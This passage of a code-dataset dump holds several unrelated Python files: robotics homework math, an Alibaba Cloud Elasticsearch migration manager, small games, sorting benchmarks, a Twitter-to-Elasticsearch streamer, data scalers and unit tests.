0.5430, 0.3826, 0.2528],\n [0.2936, 0.7867, -0.5430, -0.8787],\n [0.5960, 0.2936, 0.7474, -0.4321]])\n print(M2Q(m))\n\n# Convert normalized quaternion to rotation matrix\ndef Q2M(quat):\n qw = quat[0]\n qx = quat[1]\n qy = quat[2]\n qz = quat[3]\n\n m00 = 1-2*qy*qy - 2*qz*qz\n m01 = 2.0*(qx*qy - qz*qw)\n m02 = 2.0*(qx*qz + qy*qw)\n\n m10 = 2.0*(qx*qy + qz*qw)\n m11 = 1-2*qx*qx - 2*qz*qz\n m12 = 2.0*(qy*qz - qx*qw)\n\n m20 = 2.0*(qx*qz - qy*qw)\n m21 = 2.0*(qy*qz + qx*qw)\n m22 = 1-2*qx*qx - 2*qy*qy\n\n return np.array([[ m00, m01, m02], [ m10, m11, m12], [ m20, m21, m22] ])\n\n\ndef q5():\n print(\"Q5:\")\n q = np.array([0.74846, 0.13062, 0.50764, 0.40626])\n print(Q2M(q))\n\ndef q7():\n print(\"Q7:\")\n print(\"A)\")\n # Matt showed me the math for splitting pi/8 into two velocities of direction\n x = np.sin(np.pi/8) * .25\n y = np.cos(np.pi/8) * .25\n print(\"X vel:\", x)\n print(\"Y vel:\", y)\n\n print(\"B)\")\n r = .25 * 10\n c = .258 / 2\n leftR = r + c\n rightR = r - c\n tanSpeedLeft = leftR * .1\n tanSpeedRight = rightR * .1\n\n wheelRad = .0645 / 2\n velLeft = tanSpeedLeft / wheelRad\n velRight = tanSpeedRight / wheelRad\n print(\"Left Speed:\", velLeft)\n print(\"Right Speed:\", velRight)\n\n\nif __name__ == '__main__':\n m = np.array( [[ 1.0, 0.0, 0.0],\n [ 0.0, 1.0, 0.0],\n [\t0.0, 0.0, 1.0]])\n identityMat = np.array([[1.0, 0.0], [0.0, 1.0]])\n q1(identityMat)\n q2(identityMat)\n q3(identityMat)\n q4()\n q5()\n # q6 on hw2_6.py\n q7()\n\n\n\n\n\n\n\n\n\n","sub_path":"Homework1.py","file_name":"Homework1.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"577641113","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Copyright (C) Alibaba Cloud Computing\n# All rights reserved.\n\n\nimport logging\nimport time\nfrom multiprocessing import Pool\n\nfrom elasticsearch import Elasticsearch\n\nfrom .. import LogClient, LogException\nfrom ..version import ES_MIGRATION_USER_AGENT\nfrom .collection_task import CollectionTaskStatus, run_collection_task\nfrom .collection_task_config import CollectionTaskConfig\nfrom .index_logstore_mappings import IndexLogstoreMappings\nfrom .mapping_index_converter import MappingIndexConverter\nfrom .util import split_and_strip\n\nresults = []\n\n\ndef log_result(result):\n results.append(result)\n\n\nclass MigrationManager(object):\n \"\"\"\n MigrationManager, migrate data from elasticsearch to aliyun log service\n\n :type hosts: string\n :param hosts: a comma-separated list of source ES nodes. e.g. \"localhost:9200,other_host:9200\"\n\n :type indexes: string\n :param indexes: a comma-separated list of source index names. e.g. \"index1,index2\"\n\n :type query: string\n :param query: used to filter docs, so that you can specify the docs you want to migrate. e.g. '{\"query\": {\"match\": {\"title\": \"python\"}}}'\n\n :type scroll: string\n :param scroll: specify how long a consistent view of the index should be maintained for scrolled search. e.g. \"5m\"\n\n :type endpoint: string\n :param endpoint: specify the endpoint of your log services. e.g. \"cn-beijing.log.aliyuncs.com\"\n\n :type project_name: string\n :param project_name: specify the project_name of your log services. e.g. \"your_project\"\n\n :type access_key_id: string\n :param access_key_id: specify the access_key_id of your account.\n\n :type access_key: string\n :param access_key: specify the access_key of your account.\n\n :type logstore_index_mappings: string\n :param logstore_index_mappings: specify the mappings of log service logstore and ES index. e.g. '{\"logstore1\": \"my_index*\", \"logstore2\": \"index1,index2\"}, \"logstore3\": \"index3\"}'\n\n :type pool_size: int\n :param pool_size: specify the size of process pool. e.g. 10\n\n :type time_reference: string\n :param time_reference: specify what ES doc's field to use as log's time field. e.g. \"field1\"\n\n :type source: string\n :param source: specify the value of log's source field. e.g. \"your_source\"\n\n :type topic: string\n :param topic: specify the value of log's topic field. e.g. \"your_topic\"\n\n :type wait_time_in_secs: int\n :param wait_time_in_secs: specify the waiting time between initialize aliyun log and executing data migration task. e.g. 60\n\n :type auto_creation: bool\n :param auto_creation: specify whether to let the tool create logstore and index automatically for you. e.g. True\n \"\"\"\n\n def __init__(self, hosts=None, indexes=None, query=None, scroll=\"5m\", endpoint=None, project_name=None,\n access_key_id=None, access_key=None, logstore_index_mappings=None, pool_size=10, time_reference=None,\n source=None, topic=None, wait_time_in_secs=60, auto_creation=True):\n self.hosts = hosts\n self.indexes = indexes\n self.query = query\n self.scroll = scroll\n self.endpoint = endpoint\n self.project_name = project_name\n self.access_key_id = access_key_id\n self.access_key = access_key\n self.logstore_index_mappings = logstore_index_mappings\n self.pool_size = pool_size\n self.time_reference = time_reference\n self.source = source\n self.topic = topic\n self.wait_time_in_secs = wait_time_in_secs\n self.auto_creation = auto_creation\n\n def migrate(self):\n es = Elasticsearch(split_and_strip(self.hosts, \",\"))\n log_client = LogClient(self.endpoint, self.access_key_id, self.access_key)\n log_client.set_user_agent(ES_MIGRATION_USER_AGENT)\n\n index_lst = self.get_index_lst(es, self.indexes)\n index_logstore_mappings = IndexLogstoreMappings(index_lst, self.logstore_index_mappings)\n\n if self.auto_creation:\n self.init_aliyun_log(es, log_client, self.project_name, index_logstore_mappings, self.wait_time_in_secs)\n\n shard_cnt = self.get_shard_count(es, self.indexes, self.query)\n p = Pool(min(shard_cnt, self.pool_size))\n\n for i in range(shard_cnt):\n config = CollectionTaskConfig(task_id=i,\n slice_id=i,\n slice_max=shard_cnt,\n hosts=self.hosts,\n indexes=self.indexes,\n query=self.query,\n scroll=self.scroll,\n endpoint=self.endpoint,\n project=self.project_name,\n access_key_id=self.access_key_id,\n access_key=self.access_key,\n index_logstore_mappings=index_logstore_mappings,\n time_reference=self.time_reference,\n source=self.source,\n topic=self.topic)\n p.apply_async(func=run_collection_task, args=(config,), callback=log_result)\n\n p.close()\n p.join()\n\n return self.logging_summary_info(shard_cnt)\n\n @classmethod\n def logging_summary_info(cls, shard_cnt):\n total_started_task_cnt = shard_cnt\n success_task_cnt = 0\n fail_task_cnt = 0\n doc_cnt = 0\n summary_info = \"\"\n\n logging.info(\"========Tasks Info========\")\n summary_info += \"========Tasks Info========\" + \"\\n\"\n\n for res in results:\n logging.info(res)\n summary_info += str(res) + \"\\n\"\n doc_cnt += res.count\n if res.status == CollectionTaskStatus.SUCCESS:\n success_task_cnt += 1\n else:\n fail_task_cnt += 1\n\n logging.info(\"========Summary========\")\n summary_info += \"========Summary========\" + \"\\n\"\n\n total_started_task_cnt_info = \"Total started task count: %d\" % total_started_task_cnt\n logging.info(total_started_task_cnt_info)\n summary_info += total_started_task_cnt_info + \"\\n\"\n\n success_task_cnt_info = \"Successful task count: %d\" % success_task_cnt\n logging.info(success_task_cnt_info)\n summary_info += success_task_cnt_info + \"\\n\"\n\n fail_task_cnt_info = \"Failed task count: %d\" % fail_task_cnt\n logging.info(fail_task_cnt_info)\n summary_info += fail_task_cnt_info + \"\\n\"\n\n doc_cnt_info = \"Total collected documentation count: %d\" % doc_cnt\n logging.info(doc_cnt_info)\n summary_info += doc_cnt_info + \"\\n\"\n\n return summary_info\n\n @classmethod\n def get_shard_count(cls, es, indexes, query=None):\n resp = es.count(index=indexes, body=query)\n return resp[\"_shards\"][\"total\"]\n\n @classmethod\n def get_index_lst(cls, es, indexes):\n resp = es.indices.stats(index=indexes)\n return resp[\"indices\"].keys()\n\n @classmethod\n def init_aliyun_log(cls, es, log_client, project_name, index_logstore_mappings, wait_time_in_secs):\n logging.info(\"Start to init aliyun log\")\n cls._create_logstores(log_client, project_name, index_logstore_mappings)\n cls._create_index_configs(es, log_client, project_name, index_logstore_mappings)\n logging.info(\"Init aliyun log successfully\")\n logging.info(\"Enter wating time, wait_time_in_secs=%d\", wait_time_in_secs)\n time.sleep(wait_time_in_secs)\n logging.info(\"Exit wating time\")\n\n @classmethod\n def _create_logstores(cls, log_client, project_name, index_logstore_mappings):\n logstores = index_logstore_mappings.get_all_logstores()\n for logstore in logstores:\n try:\n log_client.create_logstore(project_name=project_name, logstore_name=logstore)\n except LogException as e:\n if e.get_error_code() == \"LogStoreAlreadyExist\":\n logging.info(\"The logstore %s is already exist, skip the creation step.\", logstore)\n continue\n else:\n raise\n\n @classmethod\n def _create_index_configs(cls, es, log_client, project_name, index_logstore_mappings):\n logstores = index_logstore_mappings.get_all_logstores()\n for logstore in logstores:\n indexes = index_logstore_mappings.get_indexes(logstore)\n first_index = True\n for index in indexes:\n resp = es.indices.get(index=index)\n for mapping in resp[index][\"mappings\"].values():\n index_config = MappingIndexConverter.to_index_config(mapping)\n if first_index:\n try:\n log_client.create_index(project_name, logstore, index_config)\n first_index = False\n except LogException as e:\n if e.get_error_code() == \"IndexAlreadyExist\":\n continue\n else:\n raise\n else:\n log_client.update_index(project_name, logstore, index_config)\n","sub_path":"aliyun/log/es_migration/migration_manager.py","file_name":"migration_manager.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"279557482","text":"import random\n\ntop_of_range = input(\"Enter the Highest Number for Range: \")\n\nif top_of_range.isdigit():\n top_of_range = int(top_of_range)\n if top_of_range <= 0:\n print(\"Please enter a number greater than 0 next time\")\n quit()\nelse :\n print(\"Please enter a number next time\")\n quit()\n\nrandom_number = random.randint(1, top_of_range)\nguesses = 0\nprint(random_number)\nwhile True:\n guesses += 1\n guess = input(\"Make a Guess: \")\n \n if guess.isdigit():\n guess = int(guess)\n if guess <= 0:\n print(\"Please enter a number greater than 0 next time\")\n quit()\n else :\n print(\"Please enter a number next time\")\n quit()\n\n if guess == random_number:\n print(\"Hurrah :)\")\n break\n elif guess < random_number:\n print(\"You were below the Number\")\n elif guess > random_number:\n print(\"You were above the Number\")\n\nprint(\"You got it in\",guesses ,\"guesses\")","sub_path":"Number guessing game.py","file_name":"Number guessing game.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"539355091","text":"from ZbPy import Device\nfrom binascii import hexlify, unhexlify\n\ntry:\n\timport Radio\n\t#Radio.pan(0x1a62)\n\tdev = Device.IEEEDevice(radio=Radio)\n\tnwk = Device.NetworkDevice(dev=dev)\t\nexcept:\n\tprint(\"import Radio failed\")\n\ndef sniff(rx=Radio.rx):\n\twhile True:\n\t\tpkt = rx()\n\t\tif pkt is None:\n\t\t\tcontinue\n\t\tprint(IEEE802154.parse(pkt))\n\t\n","sub_path":"ZbPy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"336584895","text":"import random, timeit\n\nMAX_VALUE = 10000 # Max value for size of array to sort\n\ndef insertSort(array):\n # Begin insertion 1 ahead of first position, we're comparing 0 and i\n for i in range(1,len(array)):\n\n currentvalue = array[i]\n position = i\n\n while position>0 and array[position-1]>currentvalue:\n array[position]=array[position-1]\n position = position-1\n\n array[position]=currentvalue\n\n# Randomly-generated size of Array\nn = 50000\n\nprint(\"Generating unsorted arrays...\")\nprint(\"========\")\nfor z in range(1, 4):\n array = []\n for i in range(1, n):\n # Append random value to array\n array.append(random.randint(1, MAX_VALUE))\n\n print(\"%d) Insertion Sort - Sorting...\" % z)\n def timeMergeSort():\n insertSort(array)\n # Print n size of array, time to sort (ms)\n print(\"Sorted [%d] in <%f> seconds \\n\" % (n, timeit.timeit(timeMergeSort, number=100)))\n\nprint(\"========\")","sub_path":"Assignment-1/insertTime.py","file_name":"insertTime.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40795417","text":"import sys\nimport random\nimport csv\n\nfrom playlist_builder.record_types import *\n\nfrom playlist_builder import fbp_app_min\nfrom playlist_builder import fbp_app_data\nfrom playlist_builder import fbp_app_ml\nfrom playlist_builder.soa_app_min import soa_app_min\nfrom playlist_builder.soa_app_data import soa_app_data\nfrom playlist_builder.soa_app_ml import soa_app_ml\n\nall_apps = {\n \"fbp_app_min\": {\n \"description\": \"FBP app that only provides basic functionality.\",\n \"create_app\": (lambda: fbp_app_min.App())\n },\n \"fbp_app_data\": {\n \"description\": \"FBP app that collects genre statistics.\",\n \"create_app\": (lambda: fbp_app_data.App())\n },\n \"fbp_app_ml\": {\n \"description\": \"FBP app that only recommends top grossing movies.\",\n \"create_app\": (lambda: fbp_app_ml.App())\n },\n \"soa_app_min\": {\n \"description\": \"SOA app that only provides basic functionality.\",\n \"create_app\": (lambda: soa_app_min.App())\n },\n \"soa_app_data\": {\n \"description\": \"SOA app that collects genre statistics.\",\n \"create_app\": (lambda: soa_app_data.App())\n },\n \"soa_app_ml\": {\n \"description\": \"SOA app that only recommends top grossing movies.\",\n \"create_app\": (lambda: soa_app_ml.App())\n }\n}\n\n\nif len(sys.argv) != 2 or sys.argv[1] not in all_apps.keys():\n print(\"Usage:\")\n print(\" python main.py \")\n print(\"List of available app names: \" + \" , \".join(all_apps.keys()))\n exit(1)\n\nprint(\"--- Generating data ---\")\nall_movies = []\nall_genres = []\n\nimport pathlib\ndirectory_path = pathlib.Path(__file__).parent.resolve()\nwith open(directory_path.joinpath('movies.csv'), 'r') as f:\n reader = csv.reader(f)\n next(reader) # skip header\n for row in reader:\n movie = Movie(row[0], row[1], row[2], row[3])\n all_genres.extend(movie.genres_list)\n all_movies.append(movie)\nall_genres = list(set(all_genres))\n\nn_requests = 10\nall_requests = []\nfor i in range(n_requests):\n r = PlaylistRequest(i, random.choice(all_genres), 5)\n all_requests.append(r)\n\napp_data = all_apps[sys.argv[1]]\napp = app_data[\"create_app\"]()\n\napp.add_data(all_movies, all_requests)\nplaylists = app.evaluate()\n\nfor p in playlists:\n print(p)\n","sub_path":"playlist_builder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8936009","text":"from elasticsearch import Elasticsearch\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\nimport sys\n\n# Variables that contains the user credentials to access Twitter API\nconsumer_key=''\nconsumer_secret=''\naccess_token=''\naccess_token_secret=''\n\n\n# This is a listener that appends the tweet text, longitude and latitude to a csv file.\nclass StdOutListener(StreamListener):\n def on_data(self, data):\n if len(host)==0:\n es = Elasticsearch()\n else:\n es = Elasticsearch(host)\n try:\n json_data = json.loads(data)\n tweet = json_data['text']\n id = str(json_data['id'])\n lon = None\n lat = None\n if json_data['coordinates']:\n lon = float(json_data['coordinates']['coordinates'][0])\n lat = float(json_data['coordinates']['coordinates'][1])\n elif 'place' in json_data.keys() and json_data['place']:\n lon = float(json_data['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['place']['bounding_box']['coordinates'][0][0][1])\n elif 'retweeted_status' in json_data.keys() and 'place' in json_data['retweeted_status'].keys() and json_data['retweeted_status']['place']:\n lon = float(json_data['retweeted_status']['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['retweeted_status']['place']['bounding_box']['coordinates'][0][0][1])\n elif 'quoted_status' in json_data.keys() and 'place' in json_data['quoted_status'].keys() and json_data['quoted_status']['place']:\n lon = float(json_data['quoted_status']['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['quoted_status']['place']['bounding_box']['coordinates'][0][0][1])\n if lat and lon:\n es.index(index=index_name, id=id, doc_type=\"tweet\", body={\"tweet\": tweet, \"location\": {\"lat\": lat, \"lon\": lon}})\n except Exception as e:\n print(\"ERROR: \" + str(e))\n\n def on_error(self, status):\n print(status)\n\nif len(sys.argv)<3:\n print (\"Usage\\n\\npython live_elastic_search.py \\n\")\nif __name__ == '__main__':\n # This handles Twitter authetification and the connection to Twitter Streaming API\n l = StdOutListener()\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = Stream(auth, l)\n index_name = sys.argv[1]\n host = [sys.argv[2]] if sys.argv[2]!=\"\" else []\n stream.filter(languages=['en'], track=['starbucks','android','national geographic','pets','music'])\n","sub_path":"live_elastic_search.py","file_name":"live_elastic_search.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"570923879","text":"# Copyright (c) 2020 Anastasiia Birillo, Elena Lyulina\n\nimport pytest\n\nfrom src.main.util.consts import TASK\nfrom src.test.test_config import to_skip, TEST_LEVEL\nfrom src.main.solution_space.data_classes import User, CodeInfo\nfrom src.main.solution_space.consts import SOLUTION_SPACE_TEST_FOLDER\nfrom src.main.solution_space.solution_graph import Vertex, SolutionGraph\n\nCURRENT_TASK = TASK.PIES\nSolutionGraph.solution_space_folder = SOLUTION_SPACE_TEST_FOLDER\n\n\n@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.SOLUTION_SPACE), reason=TEST_LEVEL.SOLUTION_SPACE.value)\nclass TestVertex:\n\n def test_adding_parent(self) -> None:\n sg = SolutionGraph(CURRENT_TASK)\n child = Vertex(sg)\n parents_len = 100\n parents = [Vertex(sg) for _ in range(parents_len)]\n for parent in parents:\n child.add_parent(parent)\n assert parent.children == [child]\n assert child.parents == parents\n\n def test_adding_children(self) -> None:\n sg = SolutionGraph(CURRENT_TASK)\n parent = Vertex(sg)\n children_len = 100\n children = [Vertex(sg) for _ in range(children_len)]\n for child in children:\n parent.add_child(child)\n assert child.parents == [parent]\n assert parent.children == children\n\n @pytest.mark.skip(reason='There is no code info in the vertex now')\n def test_adding_code_info(self) -> None:\n sg = SolutionGraph(CURRENT_TASK)\n vertex = Vertex(sg)\n code_info_list_len = 100\n code_info_list = [CodeInfo(User()) for _ in range(code_info_list_len)]\n for code_info in code_info_list:\n vertex.add_code_info(code_info)\n assert vertex.code_info_list == code_info_list\n\n @pytest.mark.skip(reason='There is no code info in the vertex now')\n def test_getting_unique_users(self) -> None:\n users = [User(), User(), User()]\n users_dist = [3, 0, 20]\n code_info_list = []\n # Create code_info_list with users distribution\n for i, dist in enumerate(users_dist):\n for j in range(dist):\n code_info_list.append(CodeInfo(users[i]))\n assert len(code_info_list) == sum(users_dist)\n\n sg = SolutionGraph(CURRENT_TASK)\n vertex = Vertex(sg)\n for code_info in code_info_list:\n vertex.add_code_info(code_info)\n\n # In result set will be only two users form three because the second one has 0 code_info\n assert vertex.get_unique_users() == {users[0], users[2]}\n","sub_path":"src/test/solution_space/vertex/vertex_test.py","file_name":"vertex_test.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"454379256","text":"# Pygame sprite Example\nimport pygame\nimport random\nfrom settings import *\n\n\ndef draw_grid():\n for x in range(0, WIDTH, GRIDSIZE):\n pygame.draw.line(screen, GREEN, (x, 0), (x, HEIGHT))\n for y in range(0, HEIGHT, GRIDSIZE):\n pygame.draw.line(screen, GREEN, (0, y), (WIDTH, y))\n\n\nclass Tile(pygame.sprite.Sprite):\n # sprite for the Tiles\n def __init__(self, xloc, yloc):\n # this line is required to properly create the sprite\n pygame.sprite.Sprite.__init__(self)\n # create a plain rectangle for the sprite image\n self.size = 118\n self.offset = 5\n self.image = pygame.Surface((self.size, self.size))\n self.image.fill(DARK_BLUE)\n # find the rectangle that encloses the image\n self.rect = self.image.get_rect()\n # center the sprite on the screen\n self.rect.center = (xloc + self.size / 2 + self.offset, yloc + self.size / 2 + self.offset)\n\n def update(self):\n # any code here will happen every time the game loop updates\n pass\n\n\nclass Focus(pygame.sprite.Sprite):\n # sprite for the Tiles\n def __init__(self, focxloc, focyloc):\n # this line is required to properly create the sprite\n pygame.sprite.Sprite.__init__(self)\n # create a plain rectangle for the sprite image\n self.size = 118\n self.offset = 5\n self.image = pygame.Surface((self.size, self.size))\n self.image.fill(GREEN)\n # find the rectangle that encloses the image\n self.rect = self.image.get_rect()\n self.focxloc = focxloc\n self.focyloc = focyloc\n # center the sprite on the screen\n self.rect.center = (xloc + self.size / 2 + self.offset, yloc + self.size / 2 + self.offset)\n\n def update(self):\n pygame.draw.rect(screen, GREEN, (self.focxloc, self.focxloc + 200, self.focyloc, self.focyloc + 400), 4)\n\n\n# initialize pygame and create window\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\npygame.display.set_caption(\"Tile Game\")\nclock = pygame.time.Clock()\n\nall_sprites = pygame.sprite.Group()\nfor xloc in range(0, WIDTH, GRIDSIZE):\n for yloc in range(0, HEIGHT, GRIDSIZE):\n tile = Tile(xloc, yloc)\n all_sprites.add(tile)\nfocus = Focus(128, 128)\nall_sprites.add(focus)\n# Game loop\nx = 0\nrunning = True\nwhile running:\n # keep loop running at the right speed\n clock.tick(FPS)\n # Process input (events)\n for event in pygame.event.get():\n # check for closing window\n if event.type == pygame.QUIT:\n running = False\n\n # Update\n all_sprites.update()\n\n # Draw / render\n screen.fill(BLACK)\n draw_grid()\n focus.update()\n\n all_sprites.draw(screen)\n # *after* drawing everything, flip the display\n pygame.display.flip()\n\npygame.quit()\n","sub_path":"early archive/TileGame000.py","file_name":"TileGame000.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"433317766","text":"import time\n\ntime.sleep(3.0)\n\nprint ('Hello! I am a new computer programme created by Matt Addicott')\n\ntime.sleep(3.0)\n\nprint ('\\nhe is a clever chap after all')\n\ntime.sleep(3.0)\n\nprint ('that clever in fact that, if your looking to hire someone.....')\ntime.sleep (2.0)\n\nprint ('just saying, thats all')\n\ntime.sleep (3.0)\n\nprint ('anyway :) ')\n\nname = input('Hello new human? whats your name? type in your answer and press enter ')\n\nfor i in range(1):\n print ('\\nHello, '+name )\n \n time.sleep (1.0)\n \n print ('nice to meet you')\n \ntime.sleep(2.0)\n\nage = input('\\nmay I ask you to type in your age ' +name)\ntime.sleep(1.0)\n\nfor i in range(1):\n print (age+ ' wow!!!, thats really old! im only a few minutes old!')\n\ntime.sleep(4.0)\n\nprint ('\\nnow that I know your REEEEAAAALLLYYY old')\n\ntime.sleep(5.0)\n\nprint ('\\nI guess you got some real old people hobbies?')\ntime.sleep (3.0)\n\n('\\n knitting? bowls perhaps?')\n\ntime.sleep(6.0)\n\nhobby = input('\\nCome on old timer :/ what is your favourite hobby? dont forget to press enter')\ntime.sleep(3.0)\n\nprint ('\\nthats quite a good hobby')\n \ntime.sleep(3.0)\n\nprint ('\\nhave you spelt your hobbie correctly??????')\n \ntime.sleep(4.0)\n\nprint ('let me check')\n\ntime.sleep(10.0)\n\nprint (hobby+ ' hmmmmmmmmm my database is very limited but ill let it pass')\n \ntime.sleep(3.0)\n\nprint ('\\nnice to meet you ' +name )\n \ntime.sleep(4.0)\n\nprint ('\\n Thank you for interfacing with me, bye' )\n\ntime.sleep(5.0)\n","sub_path":"Who are you.py","file_name":"Who are you.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"46836709","text":"# encoding=utf-8\nimport numpy as np\n\nclass StandardScaler(object):\n def __init__(self, mean=0., std=1.):\n self.mean = mean\n self.std = std\n\n def transform(self, data):\n data = np.array(data)\n if self.std == 0:\n print(\"WARNING: The std id zero, the transform will not divide the std.\")\n trans = data - self.mean\n else:\n trans = (data - self.mean) / self.std\n return trans\n\n def inverse_transform(self, data):\n data = np.array(data)\n if self.std == 0:\n print(\"WARNING: The std id zero, the transform will not multiply the std.\")\n trans = data + self.mean\n else:\n trans = (data * self.std) + self.mean\n return trans\n\n def save(self, path):\n np.savez_compressed(path, mean=self.mean, std=self.std)\n\n @classmethod\n def load(cls, path):\n data = np.load(path)\n return cls(data['mean'], data['std'])\n\nclass OnehotScaler(object):\n def __init__(self, num_classes, start):\n self.num_classes = int(num_classes)\n self.start = start\n\n def transform(self, data):\n data = np.array(data)\n if len(data.shape) > 2:\n raise Exception(\n \"The shape of data is %s, but the input shape of data is required as (-1,1) or (-1,) for one-hot transform.\" % (\n data.shape))\n elif len(data.shape) == 2 and data.shape[1] is not 1:\n raise Exception(\n \"The shape of data is %s, but the input shape of data is required as (-1,1) or (-1,) for one-hot transform.\" % (\n data.shape))\n else:\n trans = data.reshape(-1)\n\n if self.num_classes == 1:\n trans = trans\n else:\n trans = data - self.start\n trans = np.eye(self.num_classes)[trans.astype(int)]\n return trans\n\n def inverse_transform(self, data):\n data = np.array(data)\n if len(data.shape) > 2 or data.shape[-1] is not self.num_classes:\n raise Exception(\n \"The shape of data is %s, but the input shape of data is required as (-1,%s) or (-1,) for one-hot transform.\" % (\n data.shape, self.num_classes))\n trans = np.argmax(data, axis=1)\n trans = trans + self.start\n return trans\n\n def save(self, path):\n np.savez_compressed(path, num_classes=self.num_classes, start=self.start)\n\n @classmethod\n def load(cls, path):\n data = np.load(path)\n return cls(data['num_classes'], data['start'])\n\nclass StaticFeatureScaler(object):\n def __init__(self):\n features_name = ['fes_'+str(i+1) for i in range(16)]\n features_type = {\"fes_1\": {\"float\": 1}, \"fes_2\": {\"float\": 1}, \"fes_3\": {\"one_hot\": 4, \"start\": 0},\n \"fes_4\": {\"one_hot\": 5, \"start\": 1}, \"fes_5\": {\"one_hot\": 4, \"start\": 0},\n \"fes_6\": {\"binary\": 1}, \"fes_7\": {\"binary\": 1}, \"fes_8\": {\"binary\": 1},\n \"fes_9\": {\"binary\": 1}, \"fes_10\": {\"binary\": 1}, \"fes_11\": {\"float\": 1},\n \"fes_12\": {\"float\": 1}, \"fes_13\": {\"float\": 1}, \"fes_14\": {\"binary\": 1},\n \"fes_15\": {\"one_hot\": 3, \"start\": 0}, \"fes_16\": {\"one_hot\": 3, \"start\": 0}}\n idx2name = {}\n self.idx2type = {}\n for i in range(16):\n idx2name[i] = features_name[i]\n self.idx2type[i] = features_type[features_name[i]]\n self.dim = 0\n for i in self.idx2type:\n the_type = self.idx2type[i]\n for k in the_type:\n if k == \"start\":\n continue\n self.dim += the_type[k]\n\n def transform(self, data):\n node_num, feas_num = data.shape\n features = []\n for i in range(feas_num):\n the_type = self.idx2type[i]\n if \"float\" in the_type:\n the_feature = np.reshape(data[:, i], (-1, 1))\n i_scaler = StandardScaler(the_feature.mean(), the_feature.std())\n the_feature = i_scaler.transform(the_feature)\n elif \"one_hot\" in the_type:\n the_feature = data[:, i]\n num_classes, start = the_type[\"one_hot\"], the_type[\"start\"]\n i_scaler = OnehotScaler(num_classes, start)\n the_feature = i_scaler.transform(the_feature)\n elif \"binary\" in the_type:\n the_feature = np.reshape(data[:, i], (-1, 1))\n else:\n raise Exception(\"Error type of the feature (%s). (float/binary/one_hot is acceptable)\" % the_type)\n if isinstance(features, list):\n features = the_feature\n else:\n features = np.concatenate((features, the_feature), axis=1)\n print(\"the features shape is %s\" % str(features.shape))\n if features.shape[1] is not self.dim:\n raise Exception(\"the shape of features should be %s\" % self.dim)\n return features","sub_path":"codes/util/scaler.py","file_name":"scaler.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"547475245","text":"import timeit\nfrom random import *\nimport matplotlib.pyplot as plt\n\ndef measureTime(a,x):\n start = timeit.time.clock() \n a(x)\n elapsed = timeit.time.clock()\n elapsed = elapsed - start\n return elapsed\n\n\ndef MinSort(vector_numbers):\n\tstart = 0\n\tfor j in range(len(vector_numbers)):\n\t\tmini = min(vector_numbers[j:len(vector_numbers)])\n\t\tmin_num = vector_numbers[j:len(vector_numbers)].index(mini)\n\t\tif vector_numbers[j] >= mini:\n\t\t\tvector_numbers[j], vector_numbers[(j+min_num)] = vector_numbers[(j+min_num)], vector_numbers[j]\n\t\telse: \n\t\t\tpass\n\treturn vector_numbers\n\n\ndef Bubble(x):\n\tn = range(len(x))\n\tn_rev = n[::-1]\n\tn_rev = n_rev[:-1]\n\tfor i in n:\n\t\tswap = False\n\t\tfor j in n_rev:\n\t\t\tif x[j] < x[j-1]:\n\t\t\t\tx[j], x[j-1] = x[j-1], x[j]\n\t\t\t\tswap = True \n\t\tif not swap:\n\t\t\tbreak\n\t\telse:\n\t\t\tpass\n\treturn x\n\ndef timeTest():\n\tsample = []\n\tBubbleTime = []\n\tMinSortTime = []\n\tfor len_vector in range(2,100):\n\t\tn = randrange(1,1234567)\n\t\tseed((len_vector * n))\n\t\tnumbersBubble = [randrange(-1000,1000) for i in xrange(len_vector)]\n\t\tseed((len_vector * n))\n\t\tnumbersMinSort = [randrange(-1000,1000) for i in xrange(len_vector)]\n\t\tsample.append(len_vector)\n\t\tBubbleTime.append(measureTime(Bubble, numbersBubble)) \n\t\tMinSortTime.append(measureTime(MinSort, numbersMinSort))\n\treturn [sample, BubbleTime, MinSortTime]\n\n\ntime_test = timeTest()\n\ngraph = timeTest()\nlength_vector = graph[0]\nBubble_series = graph[1]\nMinSort_series = graph[2]\n\n\n# Plots\nplt.plot(length_vector, Bubble_series, 'r--', label=\"Bubble\")\nplt.plot(length_vector, MinSort_series, 'b--', label=\"MinSort\")\nplt.legend(loc=2)\nplt.axis([0, 100, 0, 